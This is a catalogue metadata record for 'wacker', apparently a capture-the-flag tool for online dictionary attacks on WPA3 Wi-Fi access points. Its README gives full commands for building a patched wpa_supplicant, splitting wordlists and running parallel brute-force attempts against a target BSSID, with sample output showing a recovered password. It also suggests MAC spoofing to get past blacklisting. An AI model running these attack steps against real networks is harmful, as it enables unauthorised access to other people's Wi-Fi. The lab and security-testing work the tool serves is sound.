{"id":13839565,"url":"https://github.com/blunderbuss-wctf/wacker","last_synced_at":"2025-07-11T06:30:41.552Z","repository":{"id":45556471,"uuid":"287382293","full_name":"blunderbuss-wctf/wacker","owner":"blunderbuss-wctf","description":"A WPA3 dictionary cracker","archived":false,"fork":false,"pushed_at":"2023-07-10T20:16:49.000Z","size":6437,"stargazers_count":278,"open_issues_count":1,"forks_count":56,"subscribers_count":16,"default_branch":"master","last_synced_at":"2024-08-05T17:23:53.204Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-2-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/blunderbuss-wctf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2020-08-13T21:21:28.000Z","updated_at":"2024-07-22T16:36:10.000Z","dependencies_parsed_at":"2024-01-07T09:45:20.748Z","dependency_job_id":null,"html_url":"https://github.com/blunderbuss-wctf/wacker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blunderbuss-wctf%2Fwacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/blunderbuss-wctf","download_url":"https://codeload.github.com/blunderbuss-wctf/wacker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225699917,"owners_count":17510431,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:30.277Z","updated_at":"2024-11-21T08:31:16.667Z","avatar_url":"https://github.com/blunderbuss-wctf.png","language":"C","funding_links":[],"categories":["C","C (286)","Archs"],"sub_categories":["CTFs tools"],"readme":"# Overview\nA set of scripts to help perform an online dictionary attack against a WPA3 access point. Wacker leverages the wpa_supplicant control interface to control the operations of the supplicant daemon and to get status information and event notifications ultimately helping speedup connection attempts during brute force attempts.\n\n# Virtual Wifi Arena\nIn lieu of finding a WPA3 AP for testing, consider setting up a local environment using mac80211_hwsim (details below) or by using the VMs provided by the RF Hackers Sanctuary (scoreboard.rfhackers.com).\n\n## Local Simulated Radios\nTo set up your own software simulator of 802.11 radios simply configure and load the correct mac80211_hwsim module.\n```\n# modprobe mac80211_hwsim radios=4\n# iwconfig\nwlan0     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power Management:on\n\nwlan1     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power Management:on\n\nwlan2     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power Management:on\n\nwlan3     IEEE 802.11  ESSID:off/any\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm\n          Retry short limit:7   RTS thr:off   Fragment thr:off\n          Power Management:on\n```\n\nChoose one of the new interfaces as your WPA3 access point and use the following conf file.\n```\n# cat hostapd.conf\ninterface=wlan0\nssid=WCTF_18\ndriver=nl80211\nhw_mode=g\nchannel=1\nlogger_syslog=-1\nlogger_syslog_level=3\nwpa=2\nwpa_passphrase=Aeromechanics\nwpa_key_mgmt=SAE\nrsn_pairwise=CCMP\nieee80211w=2\ngroup_mgmt_cipher=AES-128-CMAC\n```\nAnd start hostapd with\n```\n# hostapd -K -dd hostapd.conf\n```\n\n\n# Split a wordlist\nIf you have intentions of farming out your cracking efforts across a series of nics the provided split.sh script will partition a wordlist for you.\n```\n# ./split.sh 10 cyberpunk.words \n  50916 cyberpunk.words.aaa\n  50916 cyberpunk.words.aab\n  50916 cyberpunk.words.aac\n  50916 cyberpunk.words.aad\n  50916 cyberpunk.words.aae\n  50916 cyberpunk.words.aaf\n  50916 cyberpunk.words.aag\n  50916 cyberpunk.words.aah\n  50916 cyberpunk.words.aai\n  50907 cyberpunk.words.aaj\n 509151 total\n```\n\n\n# Building wpa_supplicant\nWe're providing our own wpa_supplicant in order to guarantee that certain configurations are set as well as a few mods that need to occur within the source code itself.\n```\n# apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev\n# cp defconfig wpa_supplicant-2.10/wpa_supplicant/.config\n# git apply wpa_supplicant.patch\n# cd wpa_supplicant-2.10/wpa_supplicant\n# make -j4\n# ls -al wpa_supplicant\n-rwxr-xr-x 1 root root 13541416 May 31 16:30 wpa_supplicant\n```\n\n# Python Requirement\npython3.6+ is required\n\n# Finding a target\nWacker should be seen as a complimentary tool to airodump or kismet where target selection is already performed. Wacker intentionally disables background scanning with wpa_supplicant to help speed up authentication attempts.\n\n# Running wacker\nThe wacker.py script is intended to perform all the heavy lifting and requires a few specifics regarding the target.\n```\n# ./wacker.py --help\nusage: wacker.py [-h] --wordlist WORDLIST --interface INTERFACE --bssid BSSID\n                 --ssid SSID --freq FREQ [--start START_WORD] [--debug]\n\nA WPA3 dictionary cracker. Must run as root!\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --wordlist WORDLIST   wordlist to use\n  --interface INTERFACE\n                        interface to use\n  --bssid BSSID         bssid of the target\n  --ssid SSID           the ssid of the WPA3 AP\n  --freq FREQ           frequency of the ap\n  --start START_WORD    word to start with in the wordlist\n  --debug               increase logging output\n```\nWith any luck... running the attack using just one instance...\n```\n# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412\nStart time: 21 Aug 2020 07:40:11\nStarting wpa_supplicant...\n    5795 / 509151   words (1.14%) :  79.41 words/sec : 0.020 hours lapsed :   1.76 hours to exhaust (21 Aug 2020 09:25:49)\nFound the password: 'Aeromechanics'\n\nStop time: 21 Aug 2020 07:41:24\n```\n\nRunning multiple instances of wacker is easy if you have the spare nics. Don't forget to parition the wordlist.\n```\n# ./wacker.py --wordlist cyberpunk.words.aaa --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412\n# ./wacker.py --wordlist cyberpunk.words.aab --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412\n# ./wacker.py --wordlist cyberpunk.words.aac --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan3 --freq 2412\n```\n\n# Files of interest\nwacker is quite verbose. Files of interest are found under \u003cb\u003e/tmp/wacker/\u003c/b\u003e\n - wlan1 : one end of the uds\n - wlan1_client : one end of the uds\n - wlan1.conf : initial wpa_supplicant conf needed\n - wlan1.log : supplicant output (only when using --debug option)\n - wlan1.pid : pid file for the wpa_supplciant instance\n - wlan1_wacker.log : wacker debug output\n\n\n# Caution\nwacker doesn't handle acls put in place by the target WPA3 AP. Meaning, the current code always uses the same MAC address. If the target AP blacklists our MAC address then the script won't differentiate between a true auth failure and our blacklisted MAC being rejected. This will mean that we'll consider the true password as a failure. One way to solve.... we would have to add macchanger to the source at the expense of slowdown.\n\n\n# Common Problems\n* You'll see this when your client driver doesn't support the correct AKM. Typically this manifests itself in the wpa_supplicant output after you try and run the wacker script. The supplicant will essentially hang waiting further instructions with the AKM issue detailed below. The needed AKM is 00-0F-AC:8 (SAE) in the cases of WPA3.\n\n```\nu631_3: WPA: AP group 0x10 network profile group 0x18; available group 0x10\nu631_3: WPA: using GTK CCMP\nu631_3: WPA: AP pairwise 0x10 network profile pairwise 0x18; available pairwise 0x10\nu631_3: WPA: using PTK CCMP\nu631_3: WPA: AP key_mgmt 0x400 network profile key_mgmt 0x400; available key_mgmt 0x400\nu631_3: WPA: Failed to select authenticated key management type\nu631_3: WPA: Failed to set WPA key management and encryption suites\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblunderbuss-wctf%2Fwacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fblunderbuss-wctf%2Fwacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblunderbuss-wctf%2Fwacker/lists"}